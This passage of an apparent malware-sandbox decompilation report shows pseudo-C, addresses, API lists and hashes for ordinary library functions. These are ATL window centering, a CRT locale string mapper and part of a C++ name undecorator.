                      • Opcode Fuzzy Hash: 23bb6f8888956ba4c618a3b3601bf24cfc1d3cdf8d93434c9950a3bbe578baba
                      • Instruction Fuzzy Hash: 32A194709105199FDB08EF65DCA2BEE7B75BF90301F108069F9065B2A6EF706A48CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00954E60 Relevance: 42.4, APIs: 17, Strings: 7, Instructions: 361COMMON
                      Download Yara Rule
                      C-Code - Quality: 76%
                      			E00954E60(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4) {
				signed int _v8;
				struct HWND__** _v12;
				signed int _v16;
				struct tagRECT _v36;
				struct tagRECT _v60;
				struct tagRECT _v84;
				struct HWND__* _v92;
				signed int _v96;
				struct HMONITOR__* _v100;
				struct HWND__* _v104;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				struct tagMONITORINFO _v148;
				struct HWND__* _v156;
				int _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				int _v172;
				int _v176;
				struct HWND__* _v180;
				int _v184;
				signed int _t117;
				void* _t121;
				struct HWND__* _t127;
				int _t129;
				int _t131;
				int _t134;
				int _t137;
				int _t140;
				int _t157;
				void* _t158;
				void* _t160;
				int _t165;
				void* _t166;
				void* _t167;
				int _t171;
				void* _t173;
				int _t175;
				void* _t179;
				struct HWND__* _t187;
				void* _t191;
				void* _t192;
				struct HWND__** _t196;
				int _t218;
				int _t231;
				intOrPtr _t237;
				void* _t242;
				void* _t251;
				void* _t252;
				signed int _t267;
				void* _t268;
				void* _t269;

				_t192 = __ebx;
				_push(__ecx);
				_t251 =  &_v184;
				memset(_t251, 0xcccccccc, 0x2d << 2);
				_t269 = _t268 + 0xc;
				_t252 = _t251 + 0x2d;
				_pop(_t196);
				_t117 =  *0xa0600c; // 0x5d529087
				_v8 = _t117 ^ _t267;
				_v12 = _t196;
				_t254 = _t269;
				_t121 = E009D1520(IsWindow( *_v12), _t269 - _t269);
				_t272 = _t121;
				if(_t121 == 0) {
					_t191 = L00994930(_t272, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x812, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t269 = _t269 + 0x18;
					if(_t191 == 1) {
						asm("int3");
					}
				}
				_v16 = E00954DE0(_v12, _t254);
				if(_a4 == 0) {
					if((_v16 & 0x40000000) == 0) {
						_t187 = GetWindow( *_v12, 4);
						__eflags = _t269 - _t269;
						_a4 = E009D1520(_t187, __eflags);
					} else {
						_a4 = E009D1520(GetParent( *_v12), _t269 - _t269);
					}
				}
				_t125 = E009D1520(GetWindowRect( *_v12,  &_v36), _t269 - _t269);
				_t231 = _v16 & 0x40000000;
				if(_t231 != 0) {
					_t127 = GetParent( *_v12);
					__eflags = _t269 - _t269;
					_v92 = E009D1520(_t127, _t269 - _t269);
					_t129 = IsWindow(_v92);
					__eflags = _t269 - _t269;
					__eflags = E009D1520(_t129, _t269 - _t269);
					if(__eflags == 0) {
						_t167 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x84a, 0, "%ls", L"::IsWindow(hWndParent)");
						_t269 = _t269 + 0x18;
						__eflags = _t167 - 1;
						if(_t167 == 1) {
							asm("int3");
						}
					}
					_t131 = GetClientRect(_v92,  &_v60);
					__eflags = _t269 - _t269;
					E009D1520(_t131, _t269 - _t269);
					_t134 = IsWindow(_a4);
					__eflags = _t269 - _t269;
					__eflags = E009D1520(_t134, _t269 - _t269);
					if(__eflags == 0) {
						_t166 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x84d, 0, "%ls", L"::IsWindow(hWndCenter)");
						_t269 = _t269 + 0x18;
						__eflags = _t166 - 1;
						if(_t166 == 1) {
							asm("int3");
						}
					}
					_t137 = GetClientRect(_a4,  &_v84);
					__eflags = _t269 - _t269;
					E009D1520(_t137, _t269 - _t269);
					_t140 = MapWindowPoints(_a4, _v92,  &_v84, 2);
					__eflags = _t269 - _t269;
					E009D1520(_t140, _t269 - _t269);
					L45:
					_v164 = _v36.right - _v36.left;
					_t237 = _v36.bottom - _v36.top;
					_v168 = _t237;
					asm("cdq");
					asm("cdq");
					_v172 = (_v84.left + _v84.right - _t237 >> 1) - (_v164 - _t237 >> 1);
					asm("cdq");
					asm("cdq");
					_v176 = (_v84.top + _v84.bottom - _t237 >> 1) - (_v168 - _t237 >> 1);
					__eflags = _v172 + _v164 - _v60.right;
					if(_v172 + _v164 > _v60.right) {
						_t165 = _v60.right - _v164;
						__eflags = _t165;
						_v172 = _t165;
					}
					__eflags = _v172 - _v60.left;
					if(_v172 < _v60.left) {
						_v172 = _v60.left;
					}
					__eflags = _v176 + _v168 - _v60.bottom;
					if(_v176 + _v168 > _v60.bottom) {
						_t218 = _v60.bottom - _v168;
						__eflags = _t218;
						_v176 = _t218;
					}
					__eflags = _v176 - _v60.top;
					if(_v176 < _v60.top) {
						_v176 = _v60.top;
					}
					_t262 = _t269;
					_t231 = _v172;
					_t157 = SetWindowPos( *_v12, 0, _t231, _v176, 0xffffffff, 0xffffffff, 0x15);
					__eflags = _t269 - _t269;
					_t158 = E009D1520(_t157, _t269 - _t269);
					L54:
					E009D14C0(_t267, 0x955304);
					_t160 = _t158;
					_t242 = _t231;
					return E009D1520(E00957280(_t160, _t192, _v8 ^ _t267, _t242, _t252, _t262), _t267 - _t269 + 0xb4);
				}
				if(_a4 == 0) {
					L12:
					_v100 = 0;
					if(_a4 == 0) {
						_t262 = _t269;
						_t231 =  *_v12;
						__imp__MonitorFromWindow(_t231, 2);
						__eflags = _t269 - _t269;
						_v100 = E009D1520(_t125, __eflags);
					} else {
						_t262 = _t269;
						__imp__MonitorFromWindow(_a4, 2);
						_v100 = E009D1520(_a4, _t269 - _t269);
					}
					do {
						if(_v100 == 0) {
							_v180 = 0;
						} else {
							_v180 = 1;
						}
						_v104 = _v180;
						_t286 = _v104;
						if(_v104 == 0) {
							_t179 = L00994930(_t286, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x838, 0, "%ls", L"__atl_condVal");
							_t269 = _t269 + 0x18;
							if(_t179 == 1) {
								asm("int3");
							}
						}
						if(_v104 == 0) {
							_t158 = 0;
							goto L54;
						}
						_t231 = 0;
						__eflags = 0;
					} while (0 != 0);
					_v148.cbSize = 0x28;
					_t262 = _t269;
					_t171 = GetMonitorInfoA(_v100,  &_v148);
					__eflags = _t269 - _t269;
					_v156 = E009D1520(_t171, _t269 - _t269);
					while(1) {
						__eflags = _v156;
						if(_v156 == 0) {
							_v184 = 0;
						} else {
							_v184 = 1;
						}
						_t231 = _v184;
						_v160 = _t231;
						__eflags = _v160;
						if(__eflags == 0) {
							_t173 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x83d, 0, "%ls", L"__atl_condVal");
							_t269 = _t269 + 0x18;
							__eflags = _t173 - 1;
							if(_t173 == 1) {
								asm("int3");
							}
						}
						__eflags = _v160;
						if(_v160 == 0) {
							break;
						}
						__eflags = 0;
						if(0 != 0) {
							continue;
						}
						_v60.left = _v148.rcWork;
						_v60.top = _v124;
						_v60.right = _v120;
						_v60.bottom = _v116;
						__eflags = _a4;
						if(_a4 != 0) {
							_t175 = GetWindowRect(_a4,  &_v84);
							__eflags = _t269 - _t269;
							E009D1520(_t175, _t269 - _t269);
						} else {
							_v84.left = _v60.left;
							_v84.top = _v60.top;
							_v84.right = _v60.right;
							_v84.bottom = _v60.bottom;
						}
						goto L45;
					}
					_t158 = 0;
					goto L54;
				}
				_v96 = E009D1520(GetWindowLongA(_a4, 0xfffffff0), _t269 - _t269);
				if((_v96 & 0x10000000) == 0) {
					L11:
					_a4 = 0;
					goto L12;
				}
				_t231 = _v96 & 0x20000000;
				if(_t231 == 0) {
					goto L12;
				}
				goto L11;
			}
























































                      0x00954e60
                      0x00954e6b
                      0x00954e6c
                      0x00954e7c
                      0x00954e7c
                      0x00954e7c
                      0x00954e7e
                      0x00954e7f
                      0x00954e86
                      0x00954e89
                      0x00954e8c
                      0x00954e9c
                      0x00954ea1
                      0x00954ea3
                      0x00954ebd
                      0x00954ec2
                      0x00954ec8
                      0x00954eca
                      0x00954eca
                      0x00954ec8
                      0x00954ed3
                      0x00954eda
                      0x00954ee4
                      0x00954f0a
                      0x00954f10
                      0x00954f17
                      0x00954ee6
                      0x00954efb
                      0x00954efb
                      0x00954ee4
                      0x00954f2e
                      0x00954f36
                      0x00954f3c
                      0x00955114
                      0x0095511a
                      0x00955121
                      0x0095512a
                      0x00955130
                      0x00955137
                      0x00955139
                      0x00955153
                      0x00955158
                      0x0095515b
                      0x0095515e
                      0x00955160
                      0x00955160
                      0x0095515e
                      0x0095516b
                      0x00955171
                      0x00955173
                      0x0095517e
                      0x00955184
                      0x0095518b
                      0x0095518d
                      0x009551a7
                      0x009551ac
                      0x009551af
                      0x009551b2
                      0x009551b4
                      0x009551b4
                      0x009551b2
                      0x009551bf
                      0x009551c5
                      0x009551c7
                      0x009551dc
                      0x009551e2
                      0x009551e4
                      0x009551e9
                      0x009551ef
                      0x009551f8
                      0x009551fb
                      0x00955207
                      0x00955214
                      0x0095521b
                      0x00955227
                      0x00955234
                      0x0095523b
                      0x0095524d
                      0x00955250
                      0x00955255
                      0x00955255
                      0x0095525b
                      0x0095525b
                      0x00955267
                      0x0095526a
                      0x0095526f
                      0x0095526f
                      0x00955281
                      0x00955284
                      0x00955289
                      0x00955289
                      0x0095528f
                      0x0095528f
                      0x0095529b
                      0x0095529e
                      0x009552a3
                      0x009552a3
                      0x009552a9
                      0x009552b8
                      0x009552c7
                      0x009552cd
                      0x009552cf
                      0x009552d4
                      0x009552de
                      0x009552e3
                      0x009552e4
                      0x00955301
                      0x00955301
                      0x00954f46
                      0x00954f7d
                      0x00954f7d
                      0x00954f88
                      0x00954fa4
                      0x00954fab
                      0x00954fae
                      0x00954fb4
                      0x00954fbb
                      0x00954f8a
                      0x00954f8a
                      0x00954f92
                      0x00954f9f
                      0x00954f9f
                      0x00954fbe
                      0x00954fc2
                      0x00954fd0
                      0x00954fc4
                      0x00954fc4
                      0x00954fc4
                      0x00954fe0
                      0x00954fe3
                      0x00954fe7
                      0x00955001
                      0x00955006
                      0x0095500c
                      0x0095500e
                      0x0095500e
                      0x0095500c
                      0x00955013
                      0x00955015
                      0x00000000
                      0x00955015
                      0x0095501c
                      0x0095501c
                      0x0095501c
                      0x00955020
                      0x0095502a
                      0x00955037
                      0x0095503d
                      0x00955044
                      0x0095504a
                      0x0095504a
                      0x00955051
                      0x0095505f
                      0x00955053
                      0x00955053
                      0x00955053
                      0x00955069
                      0x0095506f
                      0x00955075
                      0x0095507c
                      0x00955096
                      0x0095509b
                      0x0095509e
                      0x009550a1
                      0x009550a3
                      0x009550a3
                      0x009550a1
                      0x009550a4
                      0x009550ab
                      0x00000000
                      0x00000000
                      0x009550b4
                      0x009550b6
                      0x00000000
                      0x00000000
                      0x009550bb
                      0x009550c1
                      0x009550c7
                      0x009550cd
                      0x009550d0
                      0x009550d4
                      0x009550fa
                      0x00955100
                      0x00955102
                      0x009550d6
                      0x009550d9
                      0x009550df
                      0x009550e5
                      0x009550eb
                      0x009550eb
                      0x00000000
                      0x00955107
                      0x009550ad
                      0x00000000
                      0x009550ad
                      0x00954f5d
                      0x00954f69
                      0x00954f76
                      0x00954f76
                      0x00000000
                      0x00954f76
                      0x00954f6e
                      0x00954f74
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • IsWindow.USER32 ref: 00954E94
                      • GetParent.USER32 ref: 00954EEE
                      • GetWindow.USER32(?,00000004), ref: 00954F0A
                      • GetWindowRect.USER32 ref: 00954F26
                      • GetWindowLongA.USER32 ref: 00954F50
                      • MonitorFromWindow.USER32(00000000,00000002), ref: 00954F92
                      • MonitorFromWindow.USER32(?,00000002), ref: 00954FAE
                      • GetMonitorInfoA.USER32 ref: 00955037
                      • GetWindowRect.USER32 ref: 009550FA
                      • GetParent.USER32 ref: 00955114
                      • IsWindow.USER32(?), ref: 0095512A
                      • GetClientRect.USER32 ref: 0095516B
                      • IsWindow.USER32(00000000), ref: 0095517E
                      • GetClientRect.USER32 ref: 009551BF
                      • MapWindowPoints.USER32 ref: 009551DC
                      • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,?,?), ref: 009552C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009552DE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Rect$Monitor$ClientFromParent$CheckInfoLongPointsStackVars@8
                      • String ID: %ls$($::IsWindow(hWndCenter)$::IsWindow(hWndParent)$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$__atl_condVal
                      • API String ID: 1557619299-489089659
                      • Opcode ID: 300f33ea4a876eb743a60ea384f8c9206f062899668a11f65dd6eb21d200ac5a
                      • Instruction ID: 07a252c3905a8780bdada291b6ab18d553ef0c9dad48c5d420e0668221aad260
                      • Opcode Fuzzy Hash: 300f33ea4a876eb743a60ea384f8c9206f062899668a11f65dd6eb21d200ac5a
                      • Instruction Fuzzy Hash: 7BD1A171E40218AFCB20DFA9DC86B9DBBB5BF84315F108259F919AB281D7749D84CF81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009B8BF0 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 321timememoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009B8BF0(intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				signed int _t130;
				void* _t133;
				void* _t140;
				void* _t144;
				void* _t149;
				intOrPtr _t179;
				intOrPtr _t198;
				intOrPtr _t202;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t275;
				void* _t276;

				if(_a20 > 0) {
					_t202 = E009C2B80(_a16, _a20);
					_t272 = _t272 + 8;
					_v28 = _t202;
					if(_v28 >= _a20) {
						_a20 = _v28;
					} else {
						_a20 = _v28 + 1;
					}
				}
				_v8 = 0;
				if(_a32 == 0) {
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				if(_a36 == 0) {
					_v32 = 1;
				} else {
					_v32 = 9;
				}
				_t130 = E009B0990(_a32, _v32, _a16, _a20, 0, 0);
				_t273 = _t272 + 0x18;
				_v20 = _t130;
				if(_v20 != 0) {
					_t133 = E009B5110(_v20 << 1);
					_t274 = _t273 + 4;
					if(_t133 == 0) {
						_v36 = 0;
					} else {
						_t198 = E009B5140(E00999580(E009B5110(_v20 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\lcmapstringa.cpp", 0x6a), 0xdddd);
						_t274 = _t274 + 0x1c;
						_v36 = _t198;
					}
					E009B5090( &_v12,  *((intOrPtr*)(E009B50B0( &_v84, _v36))));
					if((E009B8BC0( &_v12) & 0x000000ff) != 0) {
						_t140 = E009B0990(_a32, 1, _a16, _a20, E009B50F0( &_v12), _v20);
						_t275 = _t274 + 0x18;
						if(_t140 != 0) {
							_v8 = E009A3D90(_a8, _a12, E009B50F0( &_v12), _v20, 0, 0, 0, 0, 0);
							if(_v8 != 0) {
								if((_a12 & 0x00000400) == 0) {
									_v24 = _v8;
									_t144 = E009B5110(_v24 << 1);
									_t276 = _t275 + 4;
									if(_t144 == 0) {
										_v40 = 0;
									} else {
										_t179 = E009B5140(E00999580(E009B5110(_v24 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\lcmapstringa.cpp", 0xa3), 0xdddd);
										_t276 = _t276 + 0x1c;
										_v40 = _t179;
									}
									E009B5090( &_v16,  *((intOrPtr*)(E009B50B0( &_v88, _v40))));
									if((E009B8BC0( &_v16) & 0x000000ff) != 0) {
										_t149 = E009B50F0( &_v16);
										_v8 = E009A3D90(_a8, _a12, E009B50F0( &_v12), _v20, _t149, _v24, 0, 0, 0);
										if(_v8 != 0) {
											if(_a28 != 0) {
												_v8 = E009B0A90(_a32, 0, E009B50F0( &_v16), _v24, _a24, _a28, 0, 0);
												if(_v8 != 0) {
													L40:
													E009B50D0( &_v16);
													L41:
													_v80 = _v8;
													E009B50D0( &_v12);
													return _v80;
												}
												_v76 = _v8;
												E009B50D0( &_v16);
												E009B50D0( &_v12);
												return _v76;
											}
											_v8 = E009B0A90(_a32, 0, E009B50F0( &_v16), _v24, 0, 0, 0, 0);
											if(_v8 != 0) {
												goto L40;
											}
											_v72 = _v8;
											E009B50D0( &_v16);
											E009B50D0( &_v12);
											return _v72;
										}
										_v68 = _v8;
										E009B50D0( &_v16);
										E009B50D0( &_v12);
										return _v68;
									} else {
										_v64 = 0;
										E009B50D0( &_v16);
										E009B50D0( &_v12);
										return _v64;
									}
								}
								if(_a28 == 0) {
									L26:
									goto L41;
								}
								if(_v8 <= _a28) {
									_v8 = E009A3D90(_a8, _a12, E009B50F0( &_v12), _v20, _a24, _a28, 0, 0, 0);
									if(_v8 != 0) {
										goto L26;
									}
									_v60 = _v8;
									E009B50D0( &_v12);
									return _v60;
								}
								_v56 = 0;
								E009B50D0( &_v12);
								return _v56;
							}
							_v52 = _v8;
							E009B50D0( &_v12);
							return _v52;
						}
						_v48 = _v8;
						E009B50D0( &_v12);
						return _v48;
					} else {
						_v44 = 0;
						E009B50D0( &_v12);
						return _v44;
					}
				} else {
					return 0;
				}
			}





































                      0x009b8bfc
                      0x009b8c06
                      0x009b8c0b
                      0x009b8c0e
                      0x009b8c17
                      0x009b8c27
                      0x009b8c19
                      0x009b8c1f
                      0x009b8c1f
                      0x009b8c17
                      0x009b8c2a
                      0x009b8c35
                      0x009b8c3f
                      0x009b8c3f
                      0x009b8c46
                      0x009b8c51
                      0x009b8c48
                      0x009b8c48
                      0x009b8c48
                      0x009b8c6c
                      0x009b8c71
                      0x009b8c74
                      0x009b8c7b
                      0x009b8c8a
                      0x009b8c8f
                      0x009b8c94
                      0x009b8cc9
                      0x009b8c96
                      0x009b8cbc
                      0x009b8cc1
                      0x009b8cc4
                      0x009b8cc4
                      0x009b8ce2
                      0x009b8cf4
                      0x009b8d28
                      0x009b8d2d
                      0x009b8d32
                      0x009b8d6e
                      0x009b8d75
                      0x009b8d96
                      0x009b8e0c
                      0x009b8e15
                      0x009b8e1a
                      0x009b8e1f
                      0x009b8e57
                      0x009b8e21
                      0x009b8e4a
                      0x009b8e4f
                      0x009b8e52
                      0x009b8e52
                      0x009b8e70
                      0x009b8e82
                      0x009b8eb0
                      0x009b8ed0
                      0x009b8ed7
                      0x009b8efb
                      0x009b8f6d
                      0x009b8f74
                      0x009b8f91
                      0x009b8f94
                      0x009b8f99
                      0x009b8f9c
                      0x009b8fa2
                      0x00000000
                      0x009b8fa7
                      0x009b8f79
                      0x009b8f7f
                      0x009b8f87
                      0x00000000
                      0x009b8f8c
                      0x009b8f20
                      0x009b8f27
                      0x00000000
                      0x009b8f44
                      0x009b8f2c
                      0x009b8f32
                      0x009b8f3a
                      0x00000000
                      0x009b8f3f
                      0x009b8edc
                      0x009b8ee2
                      0x009b8eea
                      0x00000000
                      0x009b8e84
                      0x009b8e84
                      0x009b8e8e
                      0x009b8e96
                      0x00000000
                      0x009b8e9b
                      0x009b8e82
                      0x009b8d9c
                      0x009b8e04
                      0x00000000
                      0x009b8e04
                      0x009b8da4
                      0x009b8de5
                      0x009b8dec
                      0x00000000
                      0x00000000
                      0x009b8df1
                      0x009b8df7
                      0x00000000
                      0x009b8dfc
                      0x009b8da6
                      0x009b8db0
                      0x00000000
                      0x009b8db5
                      0x009b8d7a
                      0x009b8d80
                      0x00000000
                      0x009b8d85
                      0x009b8d37
                      0x009b8d3d
                      0x00000000
                      0x009b8cf6
                      0x009b8cf6
                      0x009b8d00
                      0x00000000
                      0x009b8d05
                      0x009b8c7d
                      0x00000000
                      0x009b8c7d

                      APIs
                      • __wcstombs_l.LIBCMTD ref: 009B8CB3
                      • __MarkAllocaS.LIBCMTD ref: 009B8CBC
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009B8CD7
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009B8CE2
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B8D00
                        • Part of subcall function 009B0990: MultiByteToWideChar.KERNEL32(00000000,CCCCCCCC,?,?,?,?,?,?,00000000,CCCCCCCC), ref: 009B09C3
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B8D3D
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B8D80
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp, xrefs: 009B8C9D, 009B8E2B
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiWide__wcstombs_l
                      • String ID: minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
                      • API String ID: 3719586419-1038314930
                      • Opcode ID: f5f54925239880f99aba0052346bb5ff81753ed728d49169028e23ac39eadbbf
                      • Instruction ID: e12e537852cade0548b6d602eb25ffc15dc67206c13357b30d23ae6dd1959326
                      • Opcode Fuzzy Hash: f5f54925239880f99aba0052346bb5ff81753ed728d49169028e23ac39eadbbf
                      • Instruction Fuzzy Hash: 6BC12DB1D0010DEBDB04EF94DA92BEFB7B9AF98314F104558F505A7281DB74AE45CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00966AB0 Relevance: 42.3, APIs: 19, Strings: 5, Instructions: 276COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00966AB0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				signed int _t93;

				E0095F3F0( &_v20);
				_t93 =  *0xb30640; // 0x0
				_v8 =  *_t93;
				if(_v8 > 0x42) {
					L28:
					E00962CD0(_a4, _a8);
					return _a4;
				}
				_t5 = _v8 + 0x966e6c; // 0x6e189003
				switch( *((intOrPtr*)(( *_t5 & 0x000000ff) * 4 +  &M00966E58))) {
					case 0:
						E0095FB00(_t112, _a4, 1, _a8);
						return _a4;
					case 1:
						1 = 1 << 0;
						__ecx =  *0xb30640; // 0x0
						__edx =  *((char*)(__ecx + (1 << 0)));
						__eflags =  *((char*)(__ecx + (1 << 0))) - 0x24;
						if( *((char*)(__ecx + (1 << 0))) == 0x24) {
							__edx =  *0xb30640; // 0x0
							 *0xb30640 = __edx;
							__eax =  *0xb30640; // 0x0
							__ecx =  *__eax;
							_v12 =  *__eax;
							__eflags = _v12 - 0x59;
							if(__eflags > 0) {
								L27:
								__ecx = _a4;
								E0095F350(_a4, 2) = _a4;
								return _a4;
							}
							_t36 = _v12 + 0x966edc; // 0xcccccc09
							__eax =  *_t36 & 0x000000ff;
							switch( *((intOrPtr*)(( *_t36 & 0x000000ff) * 4 +  &M00966EB0))) {
								case 0:
									__eax = _a8;
									__ecx = _a4;
									E0095FB00(__eflags, _a4, 1, _a8) = _a4;
									return _a4;
								case 1:
									 *0xb30640 =  *0xb30640 + 1;
									 *0xb30640 =  *0xb30640 + 1;
									__edx = _a8;
									_a4 = E00965490(__ebx, __edi, __esi, _a4, _a8);
									__eax = _a4;
									return _a4;
								case 2:
									 *0xb30640 =  *0xb30640 + 1;
									 *0xb30640 =  *0xb30640 + 1;
									__edx = _a8;
									_a4 = L00966F40(__ebx, __edi, __esi, _a4, _a8, 1);
									__eax = _a4;
									return _a4;
								case 3:
									 *0xb30640 =  *0xb30640 + 1;
									 *0xb30640 =  *0xb30640 + 1;
									__ecx =  &_v92;
									__eax = E0095F3F0( &_v92);
									__edx = _a8;
									 &_v100 = E00963A20(__ebx, __edi, __esi,  &_v100, _a8, 0,  &_v100, 0);
									__ecx = _a4;
									__eax = _a4;
									return _a4;
								case 4:
									L19:
									__ecx = _a8;
									__ecx =  &_v84;
									__eax = E0095F240( &_v84, _a8);
									__edx =  *0xb30640; // 0x0
									 *0xb30640 = __edx;
									__ecx =  &_v84;
									E0096AB50( &_v84) =  &_v20;
									__ecx = _a4;
									E00967370(_a4,  &_v20,  &_v20, 3) = _a4;
									return _a4;
								case 5:
									__ecx = _a8;
									__eax = E0096A560(_a8);
									__eflags = __eax;
									if(__eax != 0) {
										_v52 = E00960060("volatile", 8);
										_v48 = __edx;
										__eax =  &_v52;
										__ecx =  &_v20;
										__eax = E0095F7E0( &_v20,  &_v52);
									} else {
										_v44 = E00960060("volatile ", 9);
										_v40 = __edx;
										__edx =  &_v44;
										__ecx =  &_v20;
										__eax = E0095F7E0( &_v20,  &_v44);
									}
									goto L19;
								case 6:
									 *0xb30640 =  *0xb30640 + 1;
									 *0xb30640 =  *0xb30640 + 1;
									__ecx = _a4;
									E0095F350(_a4, 2) = _a4;
									return _a4;
								case 7:
									 *0xb30640 =  *0xb30640 + 1;
									 *0xb30640 =  *0xb30640 + 1;
									__ecx = _a8;
									__eax = E0096A560(_a8);
									__eflags = __eax;
									if(__eax != 0) {
										_v68 = E00960060("std::nullptr_t", 0xe);
										_v64 = __edx;
										__ecx =  &_v68;
										__ecx = _a4;
										E0095F1F0(_a4,  &_v68) = _a4;
										return _a4;
									}
									_v60 = E00960060("std::nullptr_t ", 0xf);
									_v56 = __edx;
									__ecx = _a8;
									__edx =  &_v60;
									_a4 = E0095FAA0(_a4,  &_v60, _a8);
									__eax = _a4;
									return _a4;
								case 8:
									 *0xb30640 =  *0xb30640 + 1;
									 *0xb30640 =  *0xb30640 + 1;
									__edx = _a8;
									__ecx = _a4;
									E0095F240(_a4, _a8) = _a4;
									return _a4;
								case 9:
									 *0xb30640 =  *0xb30640 + 1;
									 *0xb30640 =  *0xb30640 + 1;
									_a4 = E00967B30(__ebx, __edi, __esi, __eflags, _a4);
									__eax = _a4;
									return _a4;
								case 0xa:
									goto L27;
							}
						}
						1 = 1 << 0;
						__ecx =  *0xb30640; // 0x0
						__edx =  *((char*)(__ecx + (1 << 0)));
						__eflags =  *((char*)(__ecx + (1 << 0)));
						if(__eflags == 0) {
							__eax = _a8;
							__ecx = _a4;
							E0095FB00(__eflags, _a4, 1, _a8) = _a4;
							return _a4;
						}
						__ecx = _a4;
						E0095F350(_a4, 2) = _a4;
						return _a4;
					case 2:
						L6:
						__edx = _a8;
						__ecx =  &_v76;
						__eax = E0095F240( &_v76, _a8);
						__eax =  *0xb30640; // 0x0
